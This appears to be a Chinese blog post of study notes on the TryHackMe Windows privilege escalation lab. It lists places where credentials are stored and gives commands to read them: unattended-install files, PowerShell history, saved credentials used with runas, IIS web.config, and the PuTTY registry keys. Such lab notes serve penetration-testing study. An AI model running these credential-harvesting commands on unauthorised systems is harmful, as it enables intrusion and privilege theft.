Windows 权限提升 | TryHackMe | Windows Privilege Escalation

原创 已于 2025-05-30 13:23:23 修改 · 1.2k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #网络安全 #安全 #笔记

于 2025-05-30 13:21:29 首次发布

Windows 权限提升

[!quote] 权限提升就是利用用户A的主机访问权限,利用目标系统中的漏洞来获取到用户B的访问权限

  • Windows 服务或计划任务的配置错误
  • 账户被赋予过多权限
  • 缺少Windows安全补丁

Windows 用户

Windows系统主要存在两种类型的用户,根据访问级别,分为两类

Administrators 这些用户拥有最高权限。他们可以更改任何系统配置参数并访问系统中的任何文件。
Standard Users 这些用户可以访问计算机,但只能执行有限的任务。通常,这些用户无法对系统进行永久性或必要的更改,并且只能访问其文件。

任何具有管理权限的用户都属于管理员组,而标准用户属于用户组

特殊的内置账户

SYSTEM / LocalSystem 操作系统用于执行内部任务的帐户。它拥有主机上所有文件和资源的完全访问权限,甚至比管理员的权限更高。
Local Service 用于以“最低”权限运行 Windows 服务的默认帐户。它将使用网络上的匿名连接。
Network Service 用于以“最低”权限运行 Windows 服务的默认帐户。它将使用计算机凭据通过网络进行身份验证。

常见的获取密码的位置

获取其他用户访问权限的最简单的方法就是从受到污染的计算机中收集凭证.

Unattended Windows Installation

[!quote] 在大量主机上安装 Windows 时,管理员可以使用 Windows 部署服务,该服务允许通过网络将单个操作系统映像部署到多台主机。这类安装被称为无人值守安装,因为它们不需要用户交互。此类安装需要使用管理员帐户执行初始设置,所以我们可以找到这些初始设置。

  • C:\Unattend.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml
<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>

Powershell History

每当用户使用powershell运行命令,命令都会被存储到一个文件中,用于记录之前的文件.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

[!warning]
上述命令只可以在cmd中运行,因为powershell无法将%userprofile识别为环境变量>

如果想要使用Powershell,那么需要替换为$Env:userprofile

已保存的Windows凭证

Windows 允许我们使用其他用户的凭据。此功能还提供了在系统上保存这些凭据的选项。以下命令将列出已保存的凭据:

cmdkey /list
runas /savecred /user:admin cmd.exe

IIS 配置

Internet 信息服务 (IIS) 是 Windows 安装中的默认 Web 服务器。IIS 上的网站配置存储在名为 web.config的文件中,该文件可以存储数据库密码或已配置的身份验证机制。

  • C:\inetpub\wwwroot\web.config
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

快速在我呢见中查找数据库连接字符串的命令

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

软件中寻找凭证: PuTTY

PuTTY 是 Windows 系统上常见的 SSH 客户端。用户无需每次都指定连接参数,而是可以存储会话,其中存储了 IP、用户和其他配置,以供日后使用。虽然 PuTTY 不允许用户存储 SSH 密码,但它可以存储包含明文身份验证凭据的代理配置。

#检索存储的代理凭证
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy"
最低0.47元/天 解锁文章
Tr3Ad1n
关注
tryhackme——Windows Privilege Escalation
qq_55202378的博客
03-25 899
提权的目的是获取管理员权限。
Tryhackme-Windows Exploitation Basics
个人博客
08-18 1588
Windows Exploitation Basics 文章目录Windows Exploitation BasicsWindows Fundamentals 1Task1 Introduction to WindowsTask2 Windows EditionsTask3 The Desktop (GUI)Task4 The File SystemTask5 The Windows\System32 FoldersTask6 User Accounts, Profiles, and Permission
解决访问tomcat下文件夹(如temp)显示有权限【在tomcat目录下创建文件需要管理员权限】的问题
『愚』的博客
01-30 7836
有些时候我们会看到错误日志,显示没有权限访问tomcat下的某某目录,或者用tomcat时报出了一些错误,极有可能和我们的tomcat文件夹存在访问权限的问题有关!我们试一下在tomcat下的某些目录,特别是在temp文件夹下创建文件,看是否需要管理员权限,有时我们把tomcat装到了系统盘,就会显示需要管理员权限才可以创建文件,这样会导致很多情况下提示在tomcat的目录下存在访问权限的问题。 解决办法: 进到tomcat所在的文件夹,我的是:D:\Program Files\apache\apache-
TryHackMe学习笔记-Windows PrivEsc Arena
网安星空
09-20 1301
通过靶机练习常见的Windows系统提权手法
Windows-Privilege-Escalation-Resources:来自TCM Windows Priv Esc Udemy课程的资源汇编
03-22
Windows特权升级资源 来自TCM Windows Priv Esc Udemy课程的资源汇编 一般连结 链接到网站: : 课程链接: ) 学院) 链接到不和谐服务器: : HackTheBox: ://www.hackthebox.eu/ TryHackMe: ://tryhackme.com/ TryHackMe升级实验室: ://tryhackme.com/room/windowsprivescarena 介绍 模糊安全指南: : PayloadAllTheThings: : Absoloom的指南: ://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ Sushant 747指南: : 立足点 msfvenom: ://netsec.ws/ p 3
纪念第一次权限提升TryHackMe:Linux Privilege Escalation Task5)
m0_62846132的博客
05-15 272
1.ssh karen@target ip 输入密码后进入该主机 咱们的任务是获取root权限。3.首先先下载脚本在本地,然后python3 -m http.server 1234。然后find / -name flag1.txt找到该文件所在目录。然后wget http://our ip:1234/37292.c。我们用gcc 37292.c -o cve 并且改名为 cve。cd到 flag1.txt所在的目录即可。查看flag1.txt内容拿到flag。然后在目标主机上,cd /tmp。
Tryhackme-Shells and Privilege escalation
个人博客
08-11 870
Shells and Privilege Escalation 文章目录Shells and Privilege EscalationLinux PrivEscTask1 Deploy the Vulnerable Debian VMTask2 Service ExploitsTask3 Weak File Permissions - Readable /etc/shadowTask4 Weak File Permissions - Writable /etc/shadowTask5 Weak File P
tryhackme--Linux Privilege Escalation
2301_80324937的博客
09-26 769
Linux权限提升概述 本文介绍了Linux系统权限提升的基本概念和技术方法。权限提升是渗透测试中获取更高系统访问权限的关键步骤,文章详细讲解了信息收集、系统枚举和文件查找等预备工作。 主要内容包括: 系统信息收集:通过hostname、uname、/proc/version等命令获取系统内核和版本信息 进程检查:使用ps命令查看运行进程及其权限 环境变量分析:检查PATH变量和sudo权限 用户信息收集:利用id、/etc/passwd等命令获取用户和组信息 网络配置检查:通过ifconfig、netst
【THM】Linux Privilege Escalation权限提升)-初级渗透测试
追风少年亚索的博客
04-22 843
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
【THM】Windows Privilege EscalationWindows权限提升)-初级渗透测试
追风少年亚索的博客
04-24 1313
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
Java·关于List
最新发布
Porunarufu的博客
11-25 402
List 是Collection接口的子接口,用于存储有序、可重复有序性:元素的插入顺序与存储顺序一致,支持通过索引(0 起始)访问元素;可重复性:允许存储多个相同的元素(包括null索引操作:提供了基于索引的增删改查方法(这是 List 与 Set 最核心的区别)。
整体设计 定稿 之9 拼语言工具设计之前 的 备忘录仪表盘(CodeBuddy)
ChuanfangChen的博客
11-22 1154
记录了关于拼语言工具设计讨论的关键内容,主要包括: 设计方法论:采用三层指令架构(converge/summarize/assemble)和三个职务(管理者/服务者/组织者)的结构化设计方法。 备忘录系统设计:开发了备忘录仪表盘程序,用于记录和管理设计讨论过程中的重要内容,包含状态管理、分类显示和规范生成功能。 核心概念定义:明确了语篇主题的三度结构(广度/深度/强度)及其在三个语义学分支(认知/形式/词典)中的映射关系。 设计顺序:确定了从拼语言逻辑基础到备忘录再到工具实现的开发流程。
Python的数据类型
chen_note的博客
11-21 921
Python包含六种核心数据类型: 数字类型 - 不可变类型,支持数学运算 字符串- 不可变文本类型,支持切片、格式化(f-string/%-formatting)和常用方法(split/strip/find等) 列表- 可变有序集合,支持增删改查操作 元组 - 不可变列表,用于函数传参 字典 - 键值对结构,通过key快速查找value 集合 - 去重容器,支持集合运算(并/交/差集) 流程控制包括:条件判断、循环结构、循环控制
LeetCode 23: Merge k Sorted Lists
itigoitie的博客
11-19 1116
摘要 LeetCode 23题要求合并k个有序链表为一个有序链表。主要解法包括:1) 最小堆方法(时间O(n log k),空间O(k)),利用优先队列不断取出最小节点;2) 分治法(时间O(n log k),空间O(log k)),递归合并链表对;3) 暴力法(时间O(nk)),逐个合并链表。最优解法采用最小堆或分治法,都能实现O(n log k)时间复杂度。最小堆方法通过优先队列动态维护最小节点,分治法则递归地将问题分解为合并两个链表的子问题。两种高效方法都显著优于暴力解法。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8823
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
平台政策频变,跨境卖家如何筑牢安全防线?
2501_93135886的博客
11-25 294
跨境电商正在进入精细化运营的新阶段,卖家需要在把握平台政策导向的同时,建立完善的风险防御体系,通过合规经营、供应链优化和安全管理,构建可持续的竞争壁垒,在这个快速变化的环境中,只有适应变革、主动求变的卖家,才能赢得长期发展的机会。针对这类风险,卖家需要建立更严谨的证据管理机制,从产品出厂到发货的每个环节都应保留完整的影像资料,形成可追溯的证据链,在处理客户投诉时,要求提供多角度证据或视频资料,能够有效识别AI生成的虚假内容。
人工智能时代:以备案制度筑牢安全防线
qq_58995858的博客
11-24 314
人工智能技术快速发展带来安全隐患,如自动驾驶事故、算法歧视等问题凸显。国家出台备案制度,要求AI产品提交技术资料和数据样本,增强透明度。该制度通过算法可解释性、公平性评估等机制,有效降低技术风险,提升用户信任。备案不仅是合规要求,更是构建数字时代信任基石的关键举措,将推动AI行业健康有序发展。
云原生安全
2509_93947362的博客
11-24 339
先聊聊容器安全这块硬骨头。另外,容器运行时也得盯紧,像Falco这种开源工具能实时监测异常操作,比如突然冒出的特权容器或者敏感目录访问,一有风吹草动就告警。云平台的原生安全工具也得用起来,比如AWS的Security Group和Azure的NSG,规则要最小权限原则,只开放必要端口。说实话,刚开始推行时总有人抱怨流程繁琐,等真防住几次零日漏洞攻击后,全员才意识到:云原生安全就是个持续博弈的过程,今天偷懒省一步,明天就可能全线崩盘。总之,云原生安全没有银弹,它得像编织渔网一样,把技术、流程、文化三层织密。
RpcEptMapper漏洞利用:提升Windows系统权限
1. **操作系统漏洞利用**:Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012存在注册表项权限设置不当的问题,攻击者可以利用这些漏洞提升权限。 2. **注册表项权限配置弱化**:RpcEptMapper和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值